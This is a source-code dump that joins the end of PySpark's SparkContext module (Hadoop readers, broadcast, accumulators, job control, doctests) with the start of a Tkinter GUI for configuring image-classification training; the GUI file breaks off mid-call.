A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
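Illustrative example (hypothetical path; yields (byte offset, line) pairs)::
rdd = sc.newAPIHadoopFile(
"hdfs://a-hdfs-path/input",
"org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text")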
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
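Illustrative example (hypothetical path; with the old API the input path is
supplied through the conf dict rather than as an argument)::
rdd = sc.hadoopRDD(
"org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf={"mapred.input.dir": "hdfs://a-hdfs-path/input"})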
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
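Illustrative example::
lookup = sc.broadcast({"a": 1, "b": 2})
sc.parallelize(["a", "b", "a"]).map(lambda k: lookup.value[k]).sum()  # 4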
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
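Illustrative example::
acc = sc.accumulator(0)
sc.parallelize([1, 2, 3, 4]).foreach(lambda x: acc.add(x))
acc.value  # 10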
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
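Illustrative example (hypothetical path and module name)::
sc.addPyFile("/path/to/helpers.zip")
import helpers  # modules in the archive become importable in tasks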
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
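Illustrative example (the pool name is hypothetical)::
sc.setLocalProperty("spark.scheduler.pool", "production")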
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or None if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
app.py
|
import os
import re
import sys
import shutil
import json
import traceback
import numpy.core._dtype_ctypes
import PIL.Image as PilImage
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from constants import *
from config import ModelConfig
from make_dataset import DataSets
from trains import Trains
from category import category_extract, SIMPLE_CATEGORY_MODEL
class Wizard:
job: threading.Thread
current_task: Trains
is_task_running: bool = False
def __init__(self, parent):
self.layout = {
'global': {
'start': {'x': 15, 'y': 20},
'space': {'x': 15, 'y': 25},
'tiny_space': {'x': 5, 'y': 10}
}
}
self.parent = parent
self.parent.iconbitmap(Wizard.resource_path("resource/icon.ico"))
self.current_project: str = ""
self.project_root_path = "./projects"
if not os.path.exists(self.project_root_path):
os.makedirs(self.project_root_path)
self.parent.title('Image Classification Wizard Tool based on Deep Learning')
self.parent.resizable(width=False, height=False)
self.window_width = 815
self.window_height = 780
screenwidth = self.parent.winfo_screenwidth()
screenheight = self.parent.winfo_screenheight()
size = '%dx%d+%d+%d' % (
self.window_width,
self.window_height,
(screenwidth - self.window_width) / 2,
(screenheight - self.window_height) / 2
)
self.parent.geometry(size)
self.parent.bind('<Button-1>', lambda x: self.blank_click(x))
# ============================= Group 1 =====================================
self.label_frame_source = ttk.Labelframe(self.parent, text='Sample Source')
self.label_frame_source.place(
x=self.layout['global']['start']['x'],
y=self.layout['global']['start']['y'],
width=790,
height=150
)
# Training set source path - label
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Path', anchor=tk.W)
self.inside_widget(
src=self.dataset_train_path_text,
target=self.label_frame_source,
width=90,
height=20
)
# Training set source path - input widget
self.source_train_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.source_train_path_listbox,
target=self.dataset_train_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_train_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_train_path_listbox)
)
self.listbox_scrollbar(self.source_train_path_listbox)
# Training set source path - button
self.btn_browse_train = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Trains)
)
self.next_to_widget(
src=self.btn_browse_train,
target=self.source_train_path_listbox,
width=60,
height=24,
tiny_space=True
)
# Validation set source path - label
label_edge = self.object_edge_info(self.dataset_train_path_text)
widget_edge = self.object_edge_info(self.source_train_path_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Path', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=90,
height=20
)
# Validation set source path - input widget
self.source_validation_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.next_to_widget(
src=self.source_validation_path_listbox,
target=self.dataset_validation_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_validation_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_validation_path_listbox)
)
self.listbox_scrollbar(self.source_validation_path_listbox)
# Validation set source path - button
self.btn_browse_validation = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Validation)
)
self.next_to_widget(
src=self.btn_browse_validation,
target=self.source_validation_path_listbox,
width=60,
height=24,
tiny_space=True
)
# ============================= Group 2 =====================================
self.label_frame_neu = ttk.Labelframe(self.parent, text='Neural network')
self.below_widget(
src=self.label_frame_neu,
target=self.label_frame_source,
width=790,
height=120,
tiny_space=False
)
# Max label count - label
self.label_num_text = ttk.Label(self.parent, text='Label Num', anchor=tk.W)
self.inside_widget(
src=self.label_num_text,
target=self.label_frame_neu,
width=65,
height=20,
)
# Max label count - spinbox
self.label_num_spin = ttk.Spinbox(self.parent, from_=1, to=12)
self.label_num_spin.set(1)
self.next_to_widget(
src=self.label_num_spin,
target=self.label_num_text,
width=50,
height=20,
tiny_space=True
)
# Image channel - label
self.channel_text = ttk.Label(self.parent, text='Channel', anchor=tk.W)
self.next_to_widget(
src=self.channel_text,
target=self.label_num_spin,
width=50,
height=20,
tiny_space=False
)
# Image channel - combobox
self.comb_channel = ttk.Combobox(self.parent, values=(3, 1), state='readonly')
self.comb_channel.current(0)
self.next_to_widget(
src=self.comb_channel,
target=self.channel_text,
width=38,
height=20,
tiny_space=True
)
# CNN layer - label
self.neu_cnn_text = ttk.Label(self.parent, text='CNN Layer', anchor=tk.W)
self.next_to_widget(
src=self.neu_cnn_text,
target=self.comb_channel,
width=65,
height=20,
tiny_space=False
)
# CNN layer - combobox
self.comb_neu_cnn = ttk.Combobox(self.parent, values=[_.name for _ in CNNNetwork], state='readonly')
self.comb_neu_cnn.current(0)
self.next_to_widget(
src=self.comb_neu_cnn,
target=self.neu_cnn_text,
width=80,
height=20,
tiny_space=True
)
# Recurrent layer - label
self.neu_recurrent_text = ttk.Label(self.parent, text='Recurrent Layer', anchor=tk.W)
self.next_to_widget(
src=self.neu_recurrent_text,
target=self.comb_neu_cnn,
width=95,
height=20,
tiny_space=False
)
# Recurrent layer - combobox
self.comb_recurrent = ttk.Combobox(self.parent, values=[_.name for _ in RecurrentNetwork], state='readonly')
self.comb_recurrent.current(0)
self.next_to_widget(
src=self.comb_recurrent,
target=self.neu_recurrent_text,
width=112,
height=20,
tiny_space=True
)
self.comb_recurrent.bind("<<ComboboxSelected>>", lambda x: self.auto_loss(x))
# Recurrent units count - label
self.units_num_text = ttk.Label(self.parent, text='UnitsNum', anchor=tk.W)
self.next_to_widget(
src=self.units_num_text,
target=self.comb_recurrent,
width=60,
height=20,
tiny_space=False
)
# Recurrent units count - spinbox
self.units_num_spin = ttk.Spinbox(self.parent, from_=16, to=512, increment=16, wrap=True)
self.units_num_spin.set(64)
self.next_to_widget(
src=self.units_num_spin,
target=self.units_num_text,
width=55,
height=20,
tiny_space=True
)
# Loss function - label
self.loss_func_text = ttk.Label(self.parent, text='Loss Function', anchor=tk.W)
self.below_widget(
src=self.loss_func_text,
target=self.label_num_text,
width=85,
height=20,
tiny_space=True
)
# Loss function - combobox
self.comb_loss = ttk.Combobox(self.parent, values=[_.name for _ in LossFunction], state='readonly')
self.comb_loss.current(0)
self.next_to_widget(
src=self.comb_loss,
target=self.loss_func_text,
width=101,
height=20,
tiny_space=True
)
# Optimizer - label
self.optimizer_text = ttk.Label(self.parent, text='Optimizer', anchor=tk.W)
self.next_to_widget(
src=self.optimizer_text,
target=self.comb_loss,
width=60,
height=20,
tiny_space=False
)
# Optimizer - combobox
self.comb_optimizer = ttk.Combobox(self.parent, values=[_.name for _ in Optimizer], state='readonly')
self.comb_optimizer.current(0)
self.next_to_widget(
src=self.comb_optimizer,
target=self.optimizer_text,
width=88,
height=20,
tiny_space=True
)
# Learning rate - label
self.learning_rate_text = ttk.Label(self.parent, text='Learning Rate', anchor=tk.W)
self.next_to_widget(
src=self.learning_rate_text,
target=self.comb_optimizer,
width=85,
height=20,
tiny_space=False
)
# Learning rate - spinbox
self.learning_rate_spin = ttk.Spinbox(self.parent, from_=0.00001, to=0.1, increment='0.0001')
self.learning_rate_spin.set(0.001)
self.next_to_widget(
src=self.learning_rate_spin,
target=self.learning_rate_text,
width=67,
height=20,
tiny_space=True
)
# Resize - label
self.resize_text = ttk.Label(self.parent, text='Resize', anchor=tk.W)
self.next_to_widget(
src=self.resize_text,
target=self.learning_rate_spin,
width=36,
height=20,
tiny_space=False
)
# Resize - entry
self.resize_val = tk.StringVar()
self.resize_val.set('[150, 50]')
self.resize_entry = ttk.Entry(self.parent, textvariable=self.resize_val, justify=tk.LEFT)
self.next_to_widget(
src=self.resize_entry,
target=self.resize_text,
width=60,
height=20,
tiny_space=True
)
# Size - label
self.size_text = ttk.Label(self.parent, text='Size', anchor=tk.W)
self.next_to_widget(
src=self.size_text,
target=self.resize_entry,
width=30,
height=20,
tiny_space=False
)
# Size - entry
self.size_val = tk.StringVar()
self.size_val.set('[-1, -1]')
self.size_entry = ttk.Entry(self.parent, textvariable=self.size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.size_entry,
target=self.size_text,
width=60,
height=20,
tiny_space=True
)
# Category - label
self.category_text = ttk.Label(self.parent, text='Category', anchor=tk.W)
self.below_widget(
src=self.category_text,
target=self.loss_func_text,
width=72,
height=20,
tiny_space=True
)
# Category - combobox
self.comb_category = ttk.Combobox(self.parent, values=(
'CUSTOMIZED',
'NUMERIC',
'ALPHANUMERIC',
'ALPHANUMERIC_LOWER',
'ALPHANUMERIC_UPPER',
'ALPHABET_LOWER',
'ALPHABET_UPPER',
'ALPHABET',
'ARITHMETIC',
'FLOAT',
'CHS_3500',
'ALPHANUMERIC_CHS_3500_LOWER'
), state='readonly')
self.comb_category.current(1)
self.comb_category.bind("<<ComboboxSelected>>", lambda x: self.comb_category_callback(x))
self.next_to_widget(
src=self.comb_category,
target=self.category_text,
width=225,
height=20,
tiny_space=True
)
# Category - custom entry
self.category_val = tk.StringVar()
self.category_val.set('')
self.category_entry = ttk.Entry(self.parent, textvariable=self.category_val, justify=tk.LEFT, state=tk.DISABLED)
self.next_to_widget(
src=self.category_entry,
target=self.comb_category,
width=440,
height=20,
tiny_space=False
)
# ============================= Group 3 =====================================
self.label_frame_train = ttk.Labelframe(self.parent, text='Training Configuration')
self.below_widget(
src=self.label_frame_train,
target=self.label_frame_neu,
width=790,
height=60,
tiny_space=True
)
# Training end criteria - accuracy - label
self.end_acc_text = ttk.Label(self.parent, text='End Accuracy', anchor=tk.W)
self.inside_widget(
src=self.end_acc_text,
target=self.label_frame_train,
width=85,
height=20,
)
# Training end criteria - accuracy - entry
self.end_acc_val = tk.DoubleVar()
self.end_acc_val.set(0.95)
self.end_acc_entry = ttk.Entry(self.parent, textvariable=self.end_acc_val, justify=tk.LEFT)
self.next_to_widget(
src=self.end_acc_entry,
target=self.end_acc_text,
width=56,
height=20,
tiny_space=True
)
# Training end criteria - average cost - label
self.end_cost_text = ttk.Label(self.parent, text='End Cost', anchor=tk.W)
self.next_to_widget(
src=self.end_cost_text,
target=self.end_acc_entry,
width=60,
height=20,
tiny_space=False
)
# Training end criteria - average cost - entry
self.end_cost_val = tk.DoubleVar()
self.end_cost_val.set(0.5)
self.end_cost_entry = ttk.Entry(self.parent, textvariable=self.end_cost_val, justify=tk.LEFT)
self.next_to_widget(
src=self.end_cost_entry,
target=self.end_cost_text,
width=58,
height=20,
tiny_space=True
)
# Training end criteria - epochs - label
self.end_epochs_text = ttk.Label(self.parent, text='End Epochs', anchor=tk.W)
self.next_to_widget(
src=self.end_epochs_text,
target=self.end_cost_entry,
width=72,
height=20,
tiny_space=False
)
# Training end criteria - epochs - spinbox
self.end_epochs_spin = ttk.Spinbox(self.parent, from_=0, to=10000)
self.end_epochs_spin.set(2)
self.next_to_widget(
src=self.end_epochs_spin,
target=self.end_epochs_text,
width=50,
height=20,
tiny_space=True
)
# Training batch size - label
self.batch_size_text = ttk.Label(self.parent, text='Train BatchSize', anchor=tk.W)
self.next_to_widget(
src=self.batch_size_text,
target=self.end_epochs_spin,
width=90,
height=20,
tiny_space=False
)
# Training batch size - entry
self.batch_size_val = tk.IntVar()
self.batch_size_val.set(64)
self.batch_size_entry = ttk.Entry(self.parent, textvariable=self.batch_size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.batch_size_entry,
target=self.batch_size_text,
width=40,
height=20,
tiny_space=True
)
# Validation batch size - label
self.validation_batch_size_text = ttk.Label(self.parent, text='Validation BatchSize', anchor=tk.W)
self.next_to_widget(
src=self.validation_batch_size_text,
target=self.batch_size_entry,
width=120,
height=20,
tiny_space=False
)
# Validation batch size - entry
self.validation_batch_size_val = tk.IntVar()
self.validation_batch_size_val.set(300)
self.validation_batch_size_entry = ttk.Entry(self.parent, textvariable=self.validation_batch_size_val, justify=tk.LEFT)
self.next_to_widget(
src=self.validation_batch_size_entry,
target=self.validation_batch_size_text,
width=40,
height=20,
tiny_space=True
)
# ============================= Group 4 =====================================
self.label_frame_augmentation = ttk.Labelframe(self.parent, text='Data Augmentation')
self.below_widget(
src=self.label_frame_augmentation,
target=self.label_frame_train,
width=790,
height=90,
tiny_space=True
)
# Binaryzation - label
self.binaryzation_text = ttk.Label(self.parent, text='Binaryzation', anchor=tk.W)
self.inside_widget(
src=self.binaryzation_text,
target=self.label_frame_augmentation,
width=72,
height=20,
)
# Binaryzation - entry
self.binaryzation_val = tk.IntVar()
self.binaryzation_val.set(-1)
self.binaryzation_entry = ttk.Entry(self.parent, textvariable=self.binaryzation_val, justify=tk.LEFT)
self.next_to_widget(
src=self.binaryzation_entry,
target=self.binaryzation_text,
width=55,
height=20,
tiny_space=True
)
# Median blur - label
self.median_blur_text = ttk.Label(self.parent, text='Median Blur', anchor=tk.W)
self.next_to_widget(
src=self.median_blur_text,
target=self.binaryzation_entry,
width=80,
height=20,
tiny_space=False
)
# Median blur - entry
self.median_blur_val = tk.IntVar()
self.median_blur_val.set(-1)
self.median_blur_entry = ttk.Entry(self.parent, textvariable=self.median_blur_val, justify=tk.LEFT)
self.next_to_widget(
src=self.median_blur_entry,
target=self.median_blur_text,
width=52,
height=20,
tiny_space=True
)
# Gaussian blur - label
self.gaussian_blur_text = ttk.Label(self.parent, text='Gaussian Blur', anchor=tk.W)
self.next_to_widget(
src=self.gaussian_blur_text,
target=self.median_blur_entry,
width=85,
height=20,
tiny_space=False
)
# Gaussian blur - entry
self.gaussian_blur_val = tk.IntVar()
self.gaussian_blur_val.set(-1)
self.gaussian_blur_entry = ttk.Entry(self.parent, textvariable=self.gaussian_blur_val, justify=tk.LEFT)
self.next_to_widget(
src=self.gaussian_blur_entry,
target=self.gaussian_blur_text,
width=62,
height=20,
tiny_space=True
)
# Equalize histogram - checkbutton
self.equalize_hist_val = tk.IntVar()
self.equalize_hist_val.set(0)
self.equalize_hist = ttk.Checkbutton(
self.parent, text='EqualizeHist', variable=self.equalize_hist_val, offvalue=0
)
self.next_to_widget(
src=self.equalize_hist,
target=self.gaussian_blur_entry,
width=100,
height=20,
tiny_space=False
)
# Laplace - checkbutton
self.laplace_val = tk.IntVar()
self.laplace_val.set(0)
self.laplace = ttk.Checkbutton(
self.parent, text='Laplace', variable=self.laplace_val, onvalue=1, offvalue=0
)
self.next_to_widget(
src=self.laplace,
target=self.equalize_hist,
width=64,
height=20,
tiny_space=False
)
# Rotate - label
self.rotate_text = ttk.Label(self.parent, text='Rotate (0-90)', anchor=tk.W)
self.below_widget(
src=self.rotate_text,
target=self.binaryzation_text,
width=72,
height=20,
tiny_space=True
)
# Rotate - entry
self.rotate_val = tk.IntVar()
self.rotate_val.set(-1)
self.rotate_entry = ttk.Entry(self.parent, textvariable=self.rotate_val, justify=tk.LEFT)
self.next_to_widget(
src=self.rotate_entry,
target=self.rotate_text,
width=55,
height=20,
tiny_space=True
)
# Salt-and-pepper noise - label
self.sp_noise_text = ttk.Label(self.parent, text='Pepper Noise (0-1)', anchor=tk.W)
self.next_to_widget(
src=self.sp_noise_text,
target=self.rotate_entry,
width=110,
height=20,
tiny_space=False
)
# Salt-and-pepper noise - entry
self.sp_noise_val = tk.DoubleVar()
self.sp_noise_val.set(-1)
self.sp_noise_entry = ttk.Entry(self.parent, textvariable=self.sp_noise_val, justify=tk.LEFT)
self.next_to_widget(
src=self.sp_noise_entry,
target=self.sp_noise_text,
width=71,
height=20,
tiny_space=True
)
# Warp perspective - checkbutton
self.warp_perspective_val = tk.IntVar()
self.warp_perspective_val.set(0)
self.warp_perspective = ttk.Checkbutton(
self.parent, text='Warp Perspective', variable=self.warp_perspective_val, onvalue=1, offvalue=0
)
self.next_to_widget(
src=self.warp_perspective,
target=self.sp_noise_entry,
width=130,
height=20,
tiny_space=False
)
# ============================= Group 5 =====================================
self.label_frame_project = ttk.Labelframe(self.parent, text='Project Configuration')
self.below_widget(
src=self.label_frame_project,
target=self.label_frame_augmentation,
width=790,
height=60,
tiny_space=True
)
# Project name - label
self.project_name_text = ttk.Label(self.parent, text='Project Name', anchor=tk.W)
self.inside_widget(
src=self.project_name_text,
target=self.label_frame_project,
width=90,
height=20
)
# Project name - editable combobox
self.comb_project_name = ttk.Combobox(self.parent)
self.next_to_widget(
src=self.comb_project_name,
target=self.project_name_text,
width=430,
height=20,
tiny_space=True
)
self.comb_project_name.bind(
sequence="<Return>",
func=lambda x: self.project_name_fill_callback(x)
)
self.comb_project_name.bind(
sequence="<Button-1>",
func=lambda x: self.fetch_projects()
)
self.comb_project_name.bind("<<ComboboxSelected>>", lambda x: self.read_conf(x))
# Save configuration - button
self.btn_save_conf = ttk.Button(
self.parent, text='Save Configuration', command=lambda: self.save_conf()
)
self.next_to_widget(
src=self.btn_save_conf,
target=self.comb_project_name,
width=130,
height=24,
tiny_space=False,
offset_y=-2
)
# Delete project - button
self.btn_delete = ttk.Button(
self.parent, text='Delete', command=lambda: self.delete_project()
)
self.next_to_widget(
src=self.btn_delete,
target=self.btn_save_conf,
